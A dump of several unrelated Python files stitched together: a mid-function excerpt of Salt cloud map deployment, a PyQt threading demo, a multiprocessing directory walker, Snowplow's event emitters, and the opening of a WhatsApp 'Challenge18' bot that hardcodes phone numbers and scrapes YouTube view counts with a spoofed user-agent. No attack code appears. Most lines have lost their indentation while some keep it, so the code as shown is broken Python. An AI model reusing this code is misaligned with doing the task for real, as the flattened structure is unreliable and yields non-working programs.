log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
                log.debug(
                    "Master creation details is not a dictionary: %s", out
                )
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
                if (
                    self.opts.get("show_deploy_args", False) is False
                    and isinstance(output[name], dict)
                    and "deploy_kwargs" in output[name]
                ):
                    output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
    Make every worker ignore KeyboardInterrupts, since they will be handled by
    the parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
QLabel_setText__in_thread__threading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
import time
from PyQt5.Qt import QMainWindow, QLabel, QFont, QApplication, Qt
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.label = QLabel()
self.label.setAlignment(Qt.AlignCenter)
self.label.setFont(QFont('Courier', 25))
def loop():
i = 0
while True:
self.label.setText(str(i))
i += 1
time.sleep(1)
thread = threading.Thread(target=loop, daemon=True)
thread.start()
self.setCentralWidget(self.label)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.show()
app.exec()
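# Note (added): the loop above calls QLabel.setText() from a worker thread,
# i.e. it touches a GUI object outside the Qt GUI thread, which Qt does not
# guarantee to be safe. A signal-based sketch of the same behaviour (an
# assumption, not part of the original example) would look like:
#
# from PyQt5.QtCore import pyqtSignal
#
# class SafeMainWindow(QMainWindow):
#     counter_changed = pyqtSignal(str)  # delivered in the GUI thread
#
#     def __init__(self):
#         super().__init__()
#         self.label = QLabel()
#         self.label.setAlignment(Qt.AlignCenter)
#         self.label.setFont(QFont('Courier', 25))
#         self.counter_changed.connect(self.label.setText)
#         threading.Thread(target=self._loop, daemon=True).start()
#         self.setCentralWidget(self.label)
#
#     def _loop(self):
#         i = 0
#         while True:
#             self.counter_changed.emit(str(i))  # queued to the GUI thread
#             i += 1
#             time.sleep(1)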
|
listdirs.py
|
from pathlib import Path
from pprint import pprint
import time
from multiprocessing import (Process, JoinableQueue as Queue, freeze_support)
from time import sleep
import sys
from bripy.bllb.logging import get_dbg, setup_logging
logger = setup_logging(True, "INFO", loguru_enqueue=True)
DBG = get_dbg(logger)
basepath = '.'
NUMBER_OF_PROCESSES = 1
def worker(input_q, output_q):
    while True:
item = input_q.get()
if not item:
sleep(0.05)
DBG('no item')
continue
if item == 'STOP':
logger.info('Stopping...')
input_q.task_done()
return
DBG(item)
path = Path(item)
dirs = map(str, filter(Path.is_dir, path.iterdir()))
[*map(input_q.put, dirs)]
output_q.put(item)
input_q.task_done()
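# Note (added comment): worker() walks the directory tree through the
# JoinableQueue itself: every subdirectory found is pushed back onto
# input_q for some worker to expand later, the visited path goes to
# output_q, and one 'STOP' sentinel per worker (put by main()) ends the
# loop. Pairing each get() with task_done() lets input_q.join() detect
# when the whole tree has been expanded.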
def get_q(q):
results = []
while not q.empty() or q.qsize():
item = q.get()
if item == 'STOP':
DBG('STOP get_q')
q.task_done()
break
DBG(item)
if item:
results.append(item)
q.task_done()
return results
@logger.catch
def main():
s = time.perf_counter()
task_q = Queue()
done_q = Queue()
task_q.put(basepath)
processes = [
Process(target=worker, args=(task_q, done_q))
for _ in range(NUMBER_OF_PROCESSES)
]
for process in processes:
process.start()
while not task_q.empty() or task_q.qsize():
DBG(task_q.qsize())
sleep(0.05)
logger.info(f'task_q qsize: {task_q.qsize()}')
task_q.join()
for _ in range(NUMBER_OF_PROCESSES):
task_q.put('STOP')
while not task_q.empty() or task_q.qsize() or any(map(lambda p: p.is_alive(), processes)):
DBG(task_q.qsize())
sleep(0.05)
    for process in processes:
        process.terminate()
    for process in processes:
        process.join()
    for process in processes:
        process.close()
print(f'done_q qsize: {done_q.qsize()}')
sleep(0.05)
    done_q.put('STOP')
    dir_list = get_q(done_q)
    done_q.join()
dir_set = set(dir_list)
print(f'done_q qsize: {done_q.qsize()}')
print(f'dir_list: {len(dir_list)}')
print(f'dir_set: {len(dir_set)}')
all_items = [*Path(basepath).rglob('*')]
dir_items = [*filter(Path.is_dir, all_items)]
dir_items_set = set([str(Path(item).resolve()) for item in dir_items])
print(f'dir items set: {len(dir_items_set)}')
print(f'dir items: {len(dir_items)}')
print(f'Total items: {len(all_items)}')
diff = dir_items_set - dir_set
print(f'diff: {diff}')
diff2 = dir_set - dir_items_set
print(f'diff2: {diff2}')
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.".format())
if __name__ == '__main__':
freeze_support()
sys.exit(main())
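# Minimal single-process baseline (a sketch, not part of the original script):
# breadth-first directory listing with a deque, useful for sanity-checking the
# multiprocessing version above. The function name list_dirs_bfs is made up.
from collections import deque
def list_dirs_bfs(root=basepath):
    found, pending = [], deque([Path(root)])
    while pending:
        current = pending.popleft()
        try:
            children = [p for p in current.iterdir() if p.is_dir()]
        except OSError:
            continue  # unreadable directory, skip it
        for child in children:
            found.append(str(child))
            pending.append(child)
    return found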
|
emitters.py
|
"""
emitters.py
Copyright (c) 2013-2019 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2019 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import json
import logging
import time
import threading
try:
# Python 2
from Queue import Queue
except ImportError:
# Python 3
from queue import Queue
import redis
import requests
from contracts import contract, new_contract
from snowplow_tracker.self_describing_json import SelfDescribingJson
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
DEFAULT_MAX_LENGTH = 10
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-4"
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))
class Emitter(object):
"""
Synchronously send Snowplow events to a Snowplow collector
Supports both GET and POST requests
"""
@contract
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None, byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code other than 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
        :param byte_limit: The size in bytes of the queued event list after which the buffer is flushed
:type byte_limit: int | None
"""
self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
self.method = method
if buffer_size is None:
if method == "post":
buffer_size = DEFAULT_MAX_LENGTH
else:
buffer_size = 1
self.buffer_size = buffer_size
self.buffer = []
self.byte_limit = byte_limit
self.bytes_queued = None if byte_limit is None else 0
self.on_success = on_success
self.on_failure = on_failure
self.lock = threading.RLock()
self.timer = None
logger.info("Emitter initialized with endpoint " + self.endpoint)
@staticmethod
@contract
def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
"""
:param endpoint: The raw endpoint provided by the user
:type endpoint: string
:param protocol: The protocol to use - http or https
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: Either `get` or `post` HTTP method
:type method: method
:rtype: string
"""
if method == "get":
path = "/i"
else:
path = "/com.snowplowanalytics.snowplow/tp2"
if port is None:
return protocol + "://" + endpoint + path
else:
return protocol + "://" + endpoint + ":" + str(port) + path
@contract
def input(self, payload):
"""
Adds an event to the buffer.
If the maximum size has been reached, flushes the buffer.
:param payload: The name-value pairs for the event
:type payload: dict(string:*)
"""
with self.lock:
if self.bytes_queued is not None:
self.bytes_queued += len(str(payload))
if self.method == "post":
self.buffer.append({key: str(payload[key]) for key in payload})
else:
self.buffer.append(payload)
if self.reached_limit():
self.flush()
def reached_limit(self):
"""
Checks if event-size or bytes limit are reached
:rtype: bool
"""
if self.byte_limit is None:
return len(self.buffer) >= self.buffer_size
else:
return self.bytes_queued >= self.byte_limit or len(self.buffer) >= self.buffer_size
def flush(self):
"""
Sends all events in the buffer to the collector.
"""
with self.lock:
self.send_events(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
@contract
def http_post(self, data):
"""
:param data: The array of JSONs to be sent
:type data: string
"""
logger.info("Sending POST request to %s..." % self.endpoint)
logger.debug("Payload: %s" % data)
r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("POST request finished with status code: " + str(r.status_code))
return r
@contract
def http_get(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.info("Sending GET request to %s..." % self.endpoint)
logger.debug("Payload: %s" % payload)
r = requests.get(self.endpoint, params=payload)
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("GET request finished with status code: " + str(r.status_code))
return r
def sync_flush(self):
"""
Calls the flush method of the base Emitter class.
This is guaranteed to be blocking, not asynchronous.
"""
logger.debug("Starting synchronous flush...")
Emitter.flush(self)
logger.info("Finished synchrous flush")
@staticmethod
@contract
def is_good_status_code(status_code):
"""
:param status_code: HTTP status code
:type status_code: int
:rtype: bool
"""
return 200 <= status_code < 400
@contract
def send_events(self, evts):
"""
:param evts: Array of events to be sent
:type evts: list(dict(string:*))
"""
if len(evts) > 0:
logger.info("Attempting to send %s requests" % len(evts))
Emitter.attach_sent_timestamp(evts)
if self.method == 'post':
data = SelfDescribingJson(PAYLOAD_DATA_SCHEMA, evts).to_string()
post_succeeded = False
try:
status_code = self.http_post(data).status_code
post_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if post_succeeded:
if self.on_success is not None:
self.on_success(len(evts))
elif self.on_failure is not None:
self.on_failure(0, evts)
elif self.method == 'get':
success_count = 0
unsent_requests = []
for evt in evts:
get_succeeded = False
try:
status_code = self.http_get(evt).status_code
get_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if get_succeeded:
success_count += 1
else:
unsent_requests.append(evt)
if len(unsent_requests) == 0:
if self.on_success is not None:
self.on_success(success_count)
elif self.on_failure is not None:
self.on_failure(success_count, unsent_requests)
else:
logger.info("Skipping flush since buffer is empty")
@contract
def set_flush_timer(self, timeout, flush_now=False):
"""
Set an interval at which the buffer will be flushed
:param timeout: interval in seconds
:type timeout: int | float
:param flush_now: immediately flush buffer
:type flush_now: bool
"""
        # Re-arm the timer on every call so the buffer keeps flushing at the given interval
if flush_now:
self.flush()
self.timer = threading.Timer(timeout, self.set_flush_timer, [timeout, True])
self.timer.daemon = True
self.timer.start()
def cancel_flush_timer(self):
"""
Abort automatic async flushing
"""
if self.timer is not None:
self.timer.cancel()
@staticmethod
def attach_sent_timestamp(events):
"""
Attach (by mutating in-place) current timestamp in milliseconds
as `stm` param
:param events: Array of events to be sent
:type events: list(dict(string:*))
:rtype: None
"""
def update(e):
            e.update({'stm': str(int(time.time() * 1000))})
[update(event) for event in events]
class AsyncEmitter(Emitter):
"""
Uses threads to send HTTP requests asynchronously
"""
@contract
def __init__(
self,
endpoint,
protocol="http",
port=None,
method="get",
buffer_size=None,
on_success=None,
on_failure=None,
thread_count=1,
byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code other than 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param thread_count: Number of worker threads to use for HTTP requests
:type thread_count: int
        :param byte_limit: The size in bytes of the queued event list after which the buffer is flushed
:type byte_limit: int | None
"""
super(AsyncEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, on_success, on_failure, byte_limit)
self.queue = Queue()
for i in range(thread_count):
t = threading.Thread(target=self.consume)
t.daemon = True
t.start()
def sync_flush(self):
while True:
self.flush()
self.queue.join()
if len(self.buffer) < 1:
break
def flush(self):
"""
Removes all dead threads, then creates a new thread which
executes the flush method of the base Emitter class
"""
with self.lock:
self.queue.put(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
def consume(self):
while True:
evts = self.queue.get()
self.send_events(evts)
self.queue.task_done()
class CeleryEmitter(Emitter):
"""
Uses a Celery worker to send HTTP requests asynchronously.
Works like the base Emitter class,
but on_success and on_failure callbacks cannot be set.
"""
celery_app = None
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, byte_limit=None):
super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None, byte_limit)
        from celery import Celery  # backs the async flush task below
        try:
# Check whether a custom Celery configuration module named "snowplow_celery_config" exists
import snowplow_celery_config
self.celery_app = Celery()
self.celery_app.config_from_object(snowplow_celery_config)
except ImportError:
# Otherwise configure Celery with default settings
self.celery_app = Celery("Snowplow", broker="redis://guest@localhost//")
self.async_flush = self.celery_app.task(self.async_flush)
def flush(self):
"""
Schedules a flush task
"""
self.async_flush.delay()
logger.info("Scheduled a Celery task to flush the event queue")
def async_flush(self):
super(CeleryEmitter, self).flush()
class RedisEmitter(object):
"""
Sends Snowplow events to a Redis database
"""
@contract
def __init__(self, rdb=None, key="snowplow"):
"""
:param rdb: Optional custom Redis database
:type rdb: redis | None
:param key: The Redis key for the list of events
:type key: string
"""
if rdb is None:
rdb = redis.StrictRedis()
self.rdb = rdb
self.key = key
@contract
def input(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.debug("Pushing event to Redis queue...")
self.rdb.rpush(self.key, json.dumps(payload))
logger.info("Finished sending event to Redis.")
def flush(self):
logger.warn("The RedisEmitter class does not need to be flushed")
def sync_flush(self):
self.flush()
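# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the library): constructing a synchronous
# Emitter and flushing it by hand. The collector host below is a placeholder,
# and the callback functions are only illustrative.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    def _on_success(count):
        logger.info("sent %d events", count)
    def _on_failure(sent_count, unsent):
        logger.warning("only %d events sent, %d still unsent", sent_count, len(unsent))
    demo_emitter = Emitter("collector.example.com",
                           protocol="https",
                           method="post",
                           buffer_size=5,
                           on_success=_on_success,
                           on_failure=_on_failure)
    demo_emitter.input({"e": "pv", "url": "http://example.com", "page": "Home"})
    demo_emitter.flush()  # send whatever is still buffered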
|
Challenge18Service.py
|
# Challenge18Service.py
# from app import Service
# from ctparse import ctparemidrse
# from datetime import datetime
from bs4 import BeautifulSoup
import requests
from dateparser.search import search_dates
import time
import datetime
import re
import random
import json
import emoji
from threading import Thread
import traceback
from pprint import pprint as pp
import C18Tasks
from flask import Flask, render_template, redirect, request, jsonify
from flask_jwt_extended import create_access_token
from flask_jwt_extended import get_jwt_identity
from flask_jwt_extended import jwt_required
from flask_jwt_extended import JWTManager
# from Challenge18Manager import Challenge18Manager
from urllib.request import urlopen, Request, quote
known = {"morning": "at 08:00", "afternoon": "at 16:00", "evening": "at 18:00",
"in in": "in", "at at": "at", "בבוקר": "08:00", "בצהריים": "12:00", "בערב": "18:00"}
days = "Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday".split(",")
cFormat = {"today": -1, "upcoming": {}}
# class Challenge18Service(Service):
'''
# at 20:00
Monday : Day 1
Tuesday : Day 2
Wednesday : Day 3
Thursday : Day 4
Friday : Day 4.5
Saturday : Day 5
Sunday : Day 6
Monday : Day 7
Tuesday : Day 8
Wednesday : Day 9
Thursday : Day 10
Friday : Day 10.5
Saturday : Day 11
Sunday : Day 12
Monday : Day 13
Tuesday : Day 14
Wednesday : Day 15
Thursday : Day 16
Friday : Day 16.5
Saturday : Day 17
Sunday : Day 18
'''
# from Challenge18Service import *
# site = "https://www.youtube.com/watch?v=QkF3oxziUI4&ab_channel=LedZeppelin"
# views(site)
def views(url):
# url = "https://www.youtube.com/watch?v=QkF3oxziUI4&ab_channel=LedZeppelin"
t = time.time()
headers_Get = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
with requests.Session() as session:
res=session.get(url, headers=headers_Get,cookies={'CONSENT': 'YES+cb.20210328-17-p0.en-GB+FX+{}'.format(random.randint(100, 999))})
numOfViews = -1
try:
x = res.text.split("viewCount")[4][2:].split(",\"")[0]
numOfViews = json.loads(x)["simpleText"]
except :
traceback.print_exc()
return -1
# res = urlopen(url)
# html = res.read()
# wordBreak = ['<','>']
# for i in range(len(html)):
# if html[i] in wordBreak:
# html[i] = ' '
#
# html = html.split()
# dataSwitch = False
# numOfViews = ''
# for element in html:
# if element == '/div':
# dataSwitch = False
# if dataSwitch:
# numOfViews += str(element)
# if "view-count" in str(element):
# dataSwitch = True
# print(numOfViews, " Views - Time: ",time.time()-t)
return numOfViews
class Challenge18Service():
id = "Challenge18"
name = "🙏🌍 Challenge18 🐋🌸 "
welcome = "*Welcome to 🙏🌍 Challenge18 🐋🌸* \n*שלחו* הודעה ואנחנו כבר נזכיר לכם :)"
help = "Challenge18 help message"
shortDescription = "Get your Challenge18 as whatsapp messages!"
imageurl = "https://i.imgur.com/YdXGl4K.jpg"
share = None
addMasters = ["972547932000", "972559721123"]
# examples = {"example1":{"text":"","thumbnail":None, "answer":"This is awesome in 5 seconds"}, "example2":{"text":"","thumbnail":None, "answer":"להתקשר לברוך מחר בבוקר"}}
examples = {}
emojiValues = {1: "@🧡❤️💛💚💙💜🖤🤍🤎💔❣️💕💞💓💗💖💘💝💐🌷🌹🥀🌺🌸🌼🌻🪴🎍🍀☘️🌱🌿🌴🎋🍃🌳🌲🎄🌵",
2: "🍒",
3: "🌎🌍🌏🌐⚽👂🏃🏃♀️👟💸💵💴💶💷💰💳💎💲🤑📱🤳📲📞☎️📴📳📵💡🏐🏀🏈⚾🥎🎾🏉🎱🏓🥍🏏⛹️♀️⛹️🏌️♀️🏌️🥥🐜",
18: "🤹♀️🤹♂️🥇⌛",
10: "🎥",
17: "️👣",
180: "🕉️"}
daysToSkip = [4,10,16]
push = {"international": C18Tasks.international, "Hebrew": C18Tasks.hebrew, "Family": C18Tasks.familyEng, "FamilyHeb": C18Tasks.familyHeb, "SongValuesHeb":C18Tasks.songValuesHeb}
debug = False
simulation = False
def __init__(self, db, api, master):
Challenge18Service.share = self
self.db = db
self.api = api
# if "upcoming" not in self.db or "dict" not in str(type(self.db["upcoming"])):
# self.db["upcoming"] = {}
# if "users" not in self.db:
# self.db["users"] = {}
self.id = Challenge18Service.id
self.name = Challenge18Service.name
self.welcome = Challenge18Service.welcome
self.imageurl = Challenge18Service.imageurl
# self.emojiValues = Challenge18Service.emojiValues
# self.help = Challenge18Service.help
self.managePush()
self.commands = {"#totalPoints":self.sendTotal,"#totalPointsHeb":self.sendTotalHeb, "#public":self.sendPublic}
# self.manager = Challenge18Manager.share
self.manager = None
self.master = master
self.excludeNumbers = ["972559721123@c.us"]
# self.excludeNumbers = []
def halfday(self, day):
return day/.5 % 2 == 1
def updateDay(self, current, ch = None):
if ch is not None and ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
if "skipShabbat" in challenge and str(challenge["skipShabbat"]).lower() in ["true","1"]: #Edit/skipShabbat/true
if current in self.daysToSkip :
return current + .5 # SKIPS SHABBAT
if self.halfday(current):
return int(current + .5)
return int(current + 1)
def managePush(self):
p = Thread(target=self.managePushAsync, args=[None])
p.start()
def getChallenge(self,info):
res = {}
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
# if "user" in info:
# user = info["user"]
# if "content" in info:
# content = info["content"]
res["users"] = {}
res["total"] = 0
res["scores"] = []
res["day"] = None
if origin in self.db["challenges"]:
if "today" in self.db["challenges"][origin]:
res["day"] = self.db["challenges"][origin]["today"]
if "template" in self.db["challenges"][origin]:
res["template"] = self.db["challenges"][origin]["template"]
try:
print("OOOOOOOOOOOOOOOOOOOOO",info)
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
print(":"+origin+":")
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
participants = self.master.driver.group_get_participants_ids(origin)
except :
traceback.print_exc()
participants = {}
if participants:
for user in participants:
userData = res["users"][user] = {}
if user in self.db["users"]:
u = self.db["users"][user]
if "score" in u:
res["scores"].append(u["score"])
res["total"]+=u["score"]
else:
res["scores"].append(0)
return res
def getChallengeScore(self,info):
res = {}
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
# if "user" in info:
# user = info["user"]
# if "content" in info:
# content = info["content"]
res["users"] = {}
res["total"] = 0
# res["scores"] = []
res["day"] = None
if origin in self.db["challenges"]:
if "today" in self.db["challenges"][origin]:
res["day"] = self.db["challenges"][origin]["today"]
if "template" in self.db["challenges"][origin]:
res["template"] = self.db["challenges"][origin]["template"]
try:
print("OOOOOOOOOOOOOOOOOOOOO",info)
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
print(":"+origin+":")
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
participants = self.master.driver.group_get_participants_ids(origin)
except :
traceback.print_exc()
participants = {}
if participants:
for user in participants:
# userData = res["users"][user] = {}
if user in self.db["users"]:
u = self.db["users"][user]
if "username" in u:
if "score" not in u:
self.db["users"][user]["score"] = 0
res["users"][u["username"]] = u["score"]
if "score" in u:
# res["scores"].append(u["score"])
res["total"]+=u["score"]
# else:
# res["scores"].append(0)
return res
def managePushAsync(self, data):
needsBackup = False
while "challenges" not in self.db:
time.sleep(1)
print("##################################")
print("##################################")
print("##################################")
print("MANAGING PUSH FOR C18")
lastHour = 60 * 60
